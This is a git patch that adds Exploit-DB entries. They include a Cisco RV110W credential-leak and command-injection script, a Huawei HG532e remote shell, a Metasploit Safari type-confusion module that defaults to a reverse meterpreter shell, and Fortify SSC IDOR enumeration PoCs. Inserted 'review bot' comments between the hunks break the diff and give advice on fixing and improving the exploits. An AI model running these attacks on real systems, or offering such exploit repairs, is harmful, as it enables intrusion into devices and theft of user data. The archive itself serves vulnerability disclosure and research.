From e3c06fe0f77432a0517abd1a5fcdad9bfc54c0d8 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sat, 15 Dec 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-12-15 16 changes to exploits/shellcodes Angry IP Scanner 3.5.3 - Denial of Service (PoC) UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC) Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH) Cisco RV110W - Password Disclosure / Command Execution Safari - Proxy Object Type Confusion (Metasploit) Adminer 4.3.1 - Server-Side Request Forgery Responsive FileManager 9.13.4 - Multiple Vulnerabilities Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2) Huawei Router HG532e - Command Execution Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery (Change Admin Password) Facebook And Google Reviews System For Businesses 1.1 - SQL Injection Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution Double Your Bitcoin Script Automatic - Authentication Bypass --- exploits/hardware/remote/45986.py | 98 ++++ exploits/hardware/webapps/45991.py | 51 ++ exploits/macos/remote/45998.rb | 510 +++++++++++++++++++ exploits/multiple/webapps/45989.txt | 185 +++++++ exploits/multiple/webapps/45990.txt | 185 +++++++ exploits/php/webapps/{43593.py => 43593.txt} | 0 exploits/php/webapps/45987.txt | 99 ++++ exploits/php/webapps/45992.html | 20 + exploits/php/webapps/45994.txt | 36 ++ exploits/php/webapps/45995.txt | 84 +++ exploits/php/webapps/45997.txt | 11 + exploits/windows/dos/45993.py | 21 + exploits/windows/dos/45996.py | 27 + exploits/windows/local/45988.py | 89 ++++ files_exploits.csv | 15 +- 15 files changed, 1430 insertions(+), 1 deletion(-) create mode 100755 exploits/hardware/remote/45986.py create mode 100755 exploits/hardware/webapps/45991.py create mode 100755 exploits/macos/remote/45998.rb create mode 100644 exploits/multiple/webapps/45989.txt create mode 100644 exploits/multiple/webapps/45990.txt rename 
exploits/php/webapps/{43593.py => 43593.txt} (100%) mode change 100755 => 100644 create mode 100644 exploits/php/webapps/45987.txt create mode 100644 exploits/php/webapps/45992.html create mode 100644 exploits/php/webapps/45994.txt create mode 100644 exploits/php/webapps/45995.txt create mode 100644 exploits/php/webapps/45997.txt create mode 100755 exploits/windows/dos/45993.py create mode 100755 exploits/windows/dos/45996.py create mode 100755 exploits/windows/local/45988.py diff --git a/exploits/hardware/remote/45986.py b/exploits/hardware/remote/45986.py new file mode 100755 index 000000000..6ac872869 --- /dev/null +++ b/exploits/hardware/remote/45986.py 
@@ -0,0 +1,98 @@ +#!/usr/bin/env python2 + +##### +## Cisco RV110W Password Disclosure and OS Command Execute. +### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.) + +# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute +# Date: 2018-08 +# Exploit Author: RySh +# Vendor Homepage: https://www.cisco.com/ +# Version: 1.1.0.9 +# Tested on: RV110W 1.1.0.9 +# CVE : CVE-2014-0683, CVE-2015-6396 + +import os +import sys +import re +import urllib +import urllib2 +import getopt +import json + +import ssl + +ssl._create_default_https_context = ssl._create_unverified_context + +### +# Usage: ./{script_name} 192.168.1.1 443 "reboot" +### + +if __name__ == "__main__": + IP = argv[1] + PORT = argv[2] + CMD = argv[3] + + # Get session key, Just access index page. + url = 'https://' + IP + ':' + PORT + '/' + req = urllib2.Request(url) + result = urllib2.urlopen(req) + res = result.read() + + # parse 'admin_pwd'! -- Get credits + admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1] + admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:] + print "Get Cred. 
Username = " + admin_user + ", PassHash = " + admin_pwd + + # Get session_id by POST + req2 = urllib2.Request(url + "login.cgi") + req2.add_header('Origin', url) + req2.add_header('Upgrade-Insecure-Requests', 1) + req2.add_header('Content-Type', 'application/x-www-form-urlencoded') + req2.add_header('User-Agent', + 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') + req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') + req2.add_header('Referer', url) + req2.add_header('Accept-Encoding', 'gzip, deflate') + req2.add_header('Accept-Language', 'en-US,en;q=0.9') + req2.add_header('Cookie', 'SessionID=') + data = {"submit_button": "login", + "submit_type": "", + "gui_action": "", + "wait_time": "0", + "change_action": "", + "enc": "1", + "user": admin_user, + "pwd": admin_pwd, + "sel_lang": "EN" + } + r = urllib2.urlopen(req2, urllib.urlencode(data)) + resp = r.read() + login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1] + session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1] + + # Execute your commands via diagnose command parameter, default command is `reboot` + req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id) + req3.add_header('Origin', url) + req3.add_header('Upgrade-Insecure-Requests', 1) + req3.add_header('Content-Type', 'application/x-www-form-urlencoded') + req3.add_header('User-Agent', + 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)') + req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8') + req3.add_header('Referer', url) + req3.add_header('Accept-Encoding', 'gzip, deflate') + req3.add_header('Accept-Language', 'en-US,en;q=0.9') + req3.add_header('Cookie', 'SessionID=') + data_cmd = {"submit_button": "Diagnostics", + "change_action": "gozila_cgi", + "submit_type": "start_ping", + "gui_action": "", + "traceroute_ip": "", + "commit": "1", + "ping_times": "3 |" + CMD + "|", + 
"ping_size": "64",
+ "wait_time": "4",
+ "ping_ip": "127.0.0.1",
+ "lookup_name": ""
+ }
+ r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45991.py b/exploits/hardware/webapps/45991.py
new file mode 100755
index 000000000..18878c74d
--- /dev/null
+++ b/exploits/hardware/webapps/45991.py
@@ -0,0 +1,51 @@
+#!/bin/python
+'''
+ Author : Rebellion
+ Github : @rebe11ion
+ Twitter : @rebellion
+'''
+
+import urllib2,requests,os,sys
+from requests.auth import HTTPDigestAuth
+DEFAULT_HEADERS = {"User-Agent": "Mozilla", }
+DEFAULT_TIMEOUT = 5
+def fetch_url(url):
+ global DEFAULT_HEADERS, DEFAULT_TIMEOUT
+ request = urllib2.Request(url, headers=DEFAULT_HEADERS)
+ data = urllib2.urlopen(request, timeout=DEFAULT_TIMEOUT).read()
+ return data
+
+def exploit(ip, path):
+ url = "http://%s:37215/icon/../../../%s" % (ip, path)
+ data = fetch_url(url)
+ return data
+
+def main():
+ pwd = "/"
+ cmd_path = "/tmp/ccmd"
+ pwd_path = "/tmp/cpwd"
+ while True:
+ targetip = sys.argv[1]
+ cmd_ = raw_input("[{}]$ ".format(pwd))
+ cmd = "cd {} ; {} > {} ; pwd > {}".format(pwd,cmd_.split("|")[0],cmd_path,pwd_path)
+ rm = "\n \n \n $(" + cmd + ")\n$(echo HUAWEIUPNP)\n\n \n "
+ url = "http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1"
+ requests.post(url, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
+ assert cmd_path.startswith("/"), "An absolute path is required"
+ data = exploit(targetip, cmd_path)
+ open(cmd_path,"wb").write(data)
+ if "cd" in cmd_:
+ pass
+ elif "clear" in cmd_:
+ os.system("clear")
+ elif "cat" in cmd_:
+ os.system(cmd_.replace(cmd_.split("cat")[1].split(" ")[1],cmd_path))
+ else:
+ if "|" in cmd_:
+ os.system("cat {} | {}".format(cmd_path,cmd_.split("|")[1]))
+ else:
+ os.system("cat {}".format(cmd_path))
+ pwd = exploit(targetip,pwd_path).strip("\n")
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
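Review bot: `IP = argv[1]`, `PORT = argv[2]` and `CMD = argv[3]` raise NameError before the first request is sent — the script imports `sys` but never binds `argv`; change them to `IP = sys.argv[1]`, `PORT = sys.argv[2]`, `CMD = sys.argv[3]` (or add `from sys import argv`). The login step extracts `login_st` but never acts on it, so when the pass-the-hash login fails the next line, `re.search(r'.*session_id.*\";', resp).group()`, dies with an opaque AttributeError; check the login result and exit with a message before extracting `session_id`. `ssl._create_default_https_context = ssl._create_unverified_context` disables certificate verification for the whole process, which is the practical choice against the router's self-signed certificate but deserves a one-line comment so it is not copied into tooling that talks to other hosts. The unused `os`, `getopt` and `json` imports can go.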
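Review bot: The injected command is POSTed to the hard-coded `url = "http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1"` while the output is read back from `targetip` (`sys.argv[1]`), so against any device other than 192.168.1.1 the command goes to the wrong host and the read-back quietly returns stale or empty data; build it as `url = "http://%s:37215/ctrlt/DeviceUpgrade_1" % targetip`. `open(cmd_path,"wb").write(data)` reuses the remote path `/tmp/ccmd` as a local file and never closes the handle — a `with open(...)` on a dedicated local temp file avoids clobbering the operator's own `/tmp` and leaking descriptors in the loop. `assert cmd_path.startswith("/")` is not input validation: it guards a constant and is stripped under `-O`. The raw SOAP body in `rm` appears to have lost its XML envelope in this view, so the request as printed here cannot be replayed verbatim.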
diff --git a/exploits/macos/remote/45998.rb b/exploits/macos/remote/45998.rb new file mode 100755 index 000000000..80f916705 --- /dev/null +++ b/exploits/macos/remote/45998.rb 
@@ -0,0 +1,510 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ManualRanking
+
+ include Msf::Exploit::EXE
+ include Msf::Exploit::Remote::HttpServer
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Safari Proxy Object Type Confusion',
+ 'Description' => %q{
+ This module exploits a type confusion bug in the Javascript Proxy object in
+ WebKit. The DFG JIT does not take into account that, through the use of a Proxy,
+ it is possible to run arbitrary JS code during the execution of a CreateThis
+ operation. This makes it possible to change the structure of e.g. an argument
+ without causing a bailout, leading to a type confusion (CVE-2018-4233).
+
+ The JIT region is then replaced with shellcode which loads the second stage.
+ The second stage exploits a logic error in libxpc, which uses command execution
+ via the launchd's "spawn_via_launchd" API (CVE-2018-4404).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'saelo' ],
+ 'References' => [
+ ['CVE', '2018-4233'],
+ ['CVE', '2018-4404'],
+ ['URL', 'https://github.com/saelo/cve-2018-4233'],
+ ['URL', 'https://github.com/saelo/pwn2own2018'],
+ ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],
+ ],
+ 'Arch' => [ ARCH_PYTHON, ARCH_CMD ],
+ 'Platform' => 'osx',
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },
+ 'Targets' => [
+ [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
+ [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
+ ],
+ 'DisclosureDate' => 'Mar 15 2018'))
+ register_advanced_options([
+ OptBool.new('DEBUG_EXPLOIT', [false, "Show debug information in the exploit javascript", false]),
+ ])
+ end
+
+ def offset_table
+ {
+ '10.12.6' => {
+ :jsc_vtab => '0x0000d8d8',
+ :dyld_stub_loader => '0x00001168',
+ :dlopen => '0x000027f7',
+ :confstr => '0x00002c84',
+ :strlen => '0x00001b40',
+ :strlen_got => '0xdc0',
+ },
+ '10.13' => {
+ :jsc_vtab => '0x0000e5f8',
+ :dyld_stub_loader => '0x000012a8',
+ :dlopen => '0x00002e60',
+ :confstr => '0x000024fc',
+ :strlen => '0x00001440',
+ :strlen_got => '0xee8',
+ },
+ '10.13.3' => {
+ :jsc_vtab => '0xe5e8',
+ :dyld_stub_loader => '0x1278',
+ :dlopen => '0x2e30',
+ :confstr => '0x24dc',
+ :strlen => '0x1420',
+ :strlen_got => '0xee0',
+ },
+ }
+ end
+
+ def exploit_data(directory, file)
+ path = ::File.join Msf::Config.data_directory, 'exploits', directory, file
+ ::File.binread path
+ end
+
+ def stage1_js
+ stage1 = exploit_data "CVE-2018-4233", "stage1.bin"
+ "var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);"
+ end
+
+ def stage2_js
+ stage2 = exploit_data "CVE-2018-4404", "stage2.dylib"
+ payload_cmd = payload.raw
+ if target['Arch'] == ARCH_PYTHON
+ payload_cmd = "echo \"#{payload_cmd}\" | python"
+ end
+ placeholder_index = 
stage2.index('PAYLOAD_CMD_PLACEHOLDER')
+ stage2[placeholder_index, payload_cmd.length] = payload_cmd
+ "var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);"
+ end
+
+ def get_offsets(user_agent)
+ if user_agent =~ /Intel Mac OS X (.*?)\)/
+ version = $1.gsub("_", ".")
+ mac_osx_version = Gem::Version.new(version)
+ if mac_osx_version >= Gem::Version.new('10.13.4')
+ print_warning "macOS version #{mac_osx_version} is not vulnerable"
+ elsif mac_osx_version < Gem::Version.new('10.12')
+ print_warning "macOS version #{mac_osx_version} is not vulnerable"
+ elsif offset_table.key?(version)
+ offset = offset_table[version]
+ return <<-EOF
+const JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};
+const DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};
+const DLOPEN_OFFSET = #{offset[:dlopen]};
+const CONFSTR_OFFSET = #{offset[:confstr]};
+const STRLEN_OFFSET = #{offset[:strlen]};
+const STRLEN_GOT_OFFSET = #{offset[:strlen_got]};
+EOF
+ else
+ print_warning "No offsets for version #{mac_osx_version}"
+ end
+ else
+ print_warning "Unexpected User-Agent"
+ end
+ return false
+ end
+
+ def on_request_uri(cli, request)
+ user_agent = request['User-Agent']
+ print_status("Request from #{user_agent}")
+ offsets = get_offsets(user_agent)
+ unless offsets
+ send_not_found(cli)
+ return
+ end
+
+ utils = exploit_data "CVE-2018-4233", "utils.js"
+ int64 = exploit_data "CVE-2018-4233", "int64.js"
+ html = %Q^
+
+
+
+
+
+ ^
+ unless datastore['DEBUG_EXPLOIT']
+ html.gsub!(/^\s*print\s*\(.*?\);\s*$/, '')
+ end
+ send_response(cli, html, {'Content-Type'=>'text/html'})
+ end
+
+end
\ No newline at end of file
diff --git a/exploits/multiple/webapps/45989.txt b/exploits/multiple/webapps/45989.txt
new file mode 100644
index 000000000..522d643e2
--- /dev/null
+++ b/exploits/multiple/webapps/45989.txt
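Review bot: `stage2.index('PAYLOAD_CMD_PLACEHOLDER')` returns nil if the placeholder is missing from the shipped stage2.dylib, and `stage2[placeholder_index, payload_cmd.length] = payload_cmd` then raises a bare TypeError; nothing checks that `payload_cmd.length` fits whatever space the dylib reserves after the placeholder, so an oversized payload silently overwrites the bytes that follow it (the reserved size is not visible in this hunk — confirm from the data file). Guard the assignment with `fail_with(Failure::BadConfig, 'placeholder not found in stage2.dylib') if placeholder_index.nil?` and a maximum-length check. For the Python target, `payload.raw` is interpolated straight into `echo \"...\" | python`, so any double quote, `$` or backtick in the generated payload breaks the shell line; base64-encoding it (`echo <b64> | base64 -D | python`) sidesteps the quoting entirely. The body of `html = %Q^ ... ^` is empty in this view — the inline script tags appear to have been stripped by the corpus, so the JS stage cannot be reviewed here.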
@@ -0,0 +1,185 @@ +Details +================ +Software: Fortify SSC (Software Security Center) +Version: 17.10, 17.20 & 18.10 +Homepage: https://www.microfocus.com +Advisory report: https://github.com/alt3kx/CVE-2018-7690 +CVE: CVE-2018-7690 +CVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) +CWE-639 + +Description +================ +Fortify SSC (Software Security Center) REST-API contain Insecure direct object references (IDOR) allowing reading arbitrary details of other user's +Fortify projects via GET method + +Vulnerability +================ +Fortify SSC (Software Security Center) 7.10, does not properly check ownership of projects, which allows remote authenticated (view-only) users +to read arbitrary details via API projects ID parameter to /api/v1/projects/{NUMBER} + +Note: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process. + +Proof of concept +================ + +Pre-requisites: + +- curl command deployed (Windows or Linux) +- jq command deployed (for parsing JSON fields), (Windows or Linux) +- Burpsuite Free/Pro deployed or any other Proxy to catch/send the request (optional) + +Step (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted), + +The URL normally is avaiable as following: + +Target: https://fortifyserver.com/ssc/#/ + +Step (2): Once logged extract the Cookie field, the formmat normallly as following: "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;" +Step (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default + +Step (4): The offending GET is: + +GET /ssc/api/v1/projects/2 HTTP/1.1 +Host: fortifyserver.com +Connection: close +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 
+Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF; + +Step (5): Test the first GET (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following: + +# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/2 + +-H "Host: fortifyserver.com" +-H "Connection: close" +-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" +-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" +-H "Accept-Encoding: gzip, deflate" +-H "Accept-Language: en-US,en;q=0.9" +-H "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;" +-b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF" +--proxy http://127.0.0.1:8080 | jq '.data' + +You should see the following response project details: + +{ + "createdBy": "admin", + "name": "Project Name Here", + "description": "", + "id": 2, + "creationDate": "2012-08-03T09:43:36.000+0000", + "issueTemplateId": null +} + +Step (6): Now extract all the projects details registered into Fortify SSC server: + +Payload: https://fortifyserver.com/ssc/api/v1/projects/{NUMBER} , and change the number as following: + +# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/5 + +-H "Host: fortifyserver.com" +-H "Connection: close" +-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" +-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" +-H "Accept-Encoding: gzip, deflate" +-H "Accept-Language: en-US,en;q=0.9" +-H "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;" +-b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF" +--proxy http://127.0.0.1:8080 | jq '.data' + +You should see other project details available as following: + +{ +"createdBy": "alex", +"name": "Project Name Here", +"description": "", +"id": 5, 
+"creationDate": "2012-09-21T09:35:16.000+0000", +"issueTemplateId": null +} + +Step (7): Automate with BurpSuite Pro/Free choose: + +Payload Positions: "Intruder Tab -> Positions" highlight as following: + +-> /ssc/api/v1/projects/§1§ + +Payloads set: "Intruder Tab -> Payloads" with the following data: + +-> Payload set: 1 + +-> Payload type: Numbers + +Payload Options [Numbers]: + +-> Type: Sequential + +-> 
From: 0 + +-> To: 1500 + +-> Step: 1 + +Then start attack... + +Have fun! + +Mitigations +================ +Install the latest patches availabe here: +https://softwaresupport.softwaregrp.com/doc/KM03298201 + +Disclosure policy +================ +We believes in responsible disclosure. +Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report. + +This vulnerability will be published if we do not receive a response to this report with 10 days. + +Timeline +================ + +2018-05-24: Discovered +2018-05-25: Retest PRO environment +2018-05-31: Vendor notification, two issues found +2018-05-31: Vendor feedback received +2018-06-01: Internal communication +2018-06-01: Vendor feedback, two issues are confirmed +2018-06-05: Vendor notification, new issue found +2018-06-06: Vendor feedback, evaluating High submission +2018-06-08: Vendor feedback, High issue is confirmed +2018-06-19: Researcher, reminder sent +2018-06-22: Vendor feedback, summary of CVEs handled as official way +2018-06-26: Vendor feedback, official Hotfix for High issue available to test +2018-06-29: Researcher feedback +2018-07-02: Researcher feedback +2018-07-04: Researcher feedback, Hotfix tested on QA environment +2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018 +2018-08-02: Reminder to vendor, feedback received OK! +2018-09-26: Reminder to vendor, feedback received OK! 
+2018-09-26: Fixes received from the vendor +2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem +2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem +2018-10-11: Feedback from the vendor, technical details provided to the researcher +2018-10-16: Fixes now tested on QA environment +2018-11-08: Reminder received from the vendor, feedback provided by researcher +2018-11-09: Re-rest fixes on QA environment +2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed +2018-11-21: Researcher feedback +2018-11-23: Fixes working well/confirmed by researcher +2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers. +2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure +2018-11-26: Agreements with the vendor to publish the CVE/Advisory. +2018-12-12: Public report + +Discovered by: +Alex Hernandez aka alt3kx: +================ +Please visit https://github.com/alt3kx for more information. + +My current exploit list @exploit-db: +https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576 \ No newline at end of file diff --git a/exploits/multiple/webapps/45990.txt b/exploits/multiple/webapps/45990.txt new file mode 100644 index 000000000..d619a39d1 --- /dev/null +++ b/exploits/multiple/webapps/45990.txt 
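Review bot: The Vulnerability paragraph reads "Fortify SSC (Software Security Center) 7.10" while the Details block lists 17.10, 17.20 & 18.10 — `7.10` is evidently a typo for `17.10` and should be corrected so the affected range is unambiguous. In the curl examples the session is passed twice, once via `-H "Cookie: JSESSIONID=..."` and again via `-b "JSESSIONID=..."`; it works, but a single `-b` is enough and avoids a duplicated Cookie header in the proxy capture. The Intruder range 0–1500 is a guess at the project ID space; a reader should widen or narrow it from the highest ID they observe rather than treat 1500 as a ceiling.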
@@ -0,0 +1,185 @@ +Details +================ +Software: Fortify SSC (Software Security Center) +Version: 17.10, 17.20 & 18.10 +Homepage: https://www.microfocus.com +Advisory report: https://github.com/alt3kx/CVE-2018-7691 +CVE: CVE-2018-7691 +CVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) +CWE-639 + +Description +================ +REST API contains Insecure direct object references (IDOR) allowing and extracting arbitrary details of the Local and LDAP users via POST method + +Vulnerability +================ +Fortify SSC (Software Security Center) 17.10, does not properly check ownership of "authEntities", which allows remote authenticated (view-only) users +to read arbitrary details via API bulk parameter to /api/v1/projectVersions/{NUMBER}/authEntities + +Note: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process. + +Proof of concept +================ + +Pre-requisites: + +- Curl command deployed (Windows or Linux) +- jq command deployed (for parsing JSON fields), (Windows or Linux) +- Burpsuite Free/Por deployed or any other Proxy to catch/send the request (optional) + +Step (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted), + +The URL normally is avaiable as following: + +Target: https://fortifyserver.com/ssc/#/ + +Step (2): Once logged extract the Cookie field, the format normally as following: "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;" +Step (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default + +Step (4): The offending POST is: + +POST /ssc/api/v1/bulk HTTP/1.1 +Host: fortifyserver.com +Connection: close +Accept: application/json, text/plain, */* +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 +Content-Type: application/json;charset=UTF-8 +Accept-Encoding: gzip, 
deflate +Accept-Language: en-US,en;q=0.9 +Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414; +Content-Length: 123 + +{"requests":[{"uri":"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities","httpVerb":"GET"}]}\x0d\x0a + +Step (5): Test the first POST (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following: + +# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk + +-H "Host: fortifyserver.com" +-H "Connection: close" +-H "Accept: application/json, text/plain, */*" +-H "X-Requested-With: XMLHttpRequest" +-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" +-H "Content-Type: application/json;charset=UTF-8" +-H "Accept-Encoding: gzip, deflate" +-H "Accept-Language: en-US,en;q=0.9" +-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;" +-b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;" +--data-binary "{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a" +--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .responseCode' + +You should see the following response: + +200 + +Step (6): Now extract all local and LDAP users registered into Fortify SSC server: + +Payload: /api/v1/projectVersions/{NUMBER}/authEntities, see the field "--data-binary" below and change the number as following: + +# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk + +-H "Host: fortifyserver.com" +-H "Connection: close" +-H "Accept: application/json, text/plain, */*" +-H "X-Requested-With: XMLHttpRequest" +-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36" +-H "Content-Type: application/json;charset=UTF-8" +-H "Accept-Encoding: gzip, deflate" +-H "Accept-Language: en-US,en;q=0.9" +-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;" +-b 
"JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;" +--data-binary "{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a" +--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .data[] .entityName' + +You should see the following response with users available + +"admin" +"sca" +"alex" + +[../snip] + +Step (7): Automate with BurpSuite Pro/Free choose: + +Payload Positions: "Intruder Tab -> Positions" highlight as following: + +-> /api/v1/projectVersions/§1§/authEntities + +Payloads set: "Intruder Tab -> Payloads" with the following data: + +-> Payload set: 1 + +-> Payload type: Numbers + +Payload Options [Numbers]: + +-> Type: Sequential + +-> 
From: 0 + +-> To: 1500 + +-> Step: 1 + +Then start attack… +Have fun! + +Have fun! + +Mitigations +================ +Install the latest patches availabe here: +https://softwaresupport.softwaregrp.com/doc/KM03298201 + +Disclosure policy +================ +We believes in responsible disclosure. +Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report. + +This vulnerability will be published if we do not receive a response to this report with 10 days. + +Timeline +================ + +2018-05-24: Discovered +2018-05-25: Retest PRO environment +2018-05-31: Vendor notification, two issues found +2018-05-31: Vendor feedback received +2018-06-01: Internal communication +2018-06-01: Vendor feedback, two issues are confirmed +2018-06-05: Vendor notification, new issue found +2018-06-06: Vendor feedback, evaluating High submission +2018-06-08: Vendor feedback, High issue is confirmed +2018-06-19: Researcher, reminder sent +2018-06-22: Vendor feedback, summary of CVEs handled as official way +2018-06-26: Vendor feedback, official Hotfix for High issue available to test +2018-06-29: Researcher feedback +2018-07-02: Researcher feedback +2018-07-04: Researcher feedback, Hotfix tested on QA environment +2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018 +2018-08-02: Reminder to vendor, feedback received OK! +2018-09-26: Reminder to vendor, feedback received OK! 
+2018-09-26: Fixes received from the vendor +2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem +2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem +2018-10-11: Feedback from the vendor, technical details provided to the researcher +2018-10-16: Fixes now tested on QA environment +2018-11-08: Reminder received from the vendor, feedback provided by researcher +2018-11-09: Re-rest fixes on QA environment +2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed +2018-11-21: Researcher feedback +2018-11-23: Fixes working well/confirmed by researcher +2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers. +2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure +2018-11-26: Agreements with the vendor to publish the CVE/Advisory. +2018-12-12: Public report + +Discovered by: +Alex Hernandez aka alt3kx: +================ +Please visit https://github.com/alt3kx for more information. + +My current exploit list @exploit-db: +https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576 \ No newline at end of file diff --git a/exploits/php/webapps/43593.py b/exploits/php/webapps/43593.txt old mode 100755 new mode 100644 similarity index 100% rename from exploits/php/webapps/43593.py rename to exploits/php/webapps/43593.txt diff --git a/exploits/php/webapps/45987.txt b/exploits/php/webapps/45987.txt new file mode 100644 index 000000000..b79b82e16 --- /dev/null +++ b/exploits/php/webapps/45987.txt 
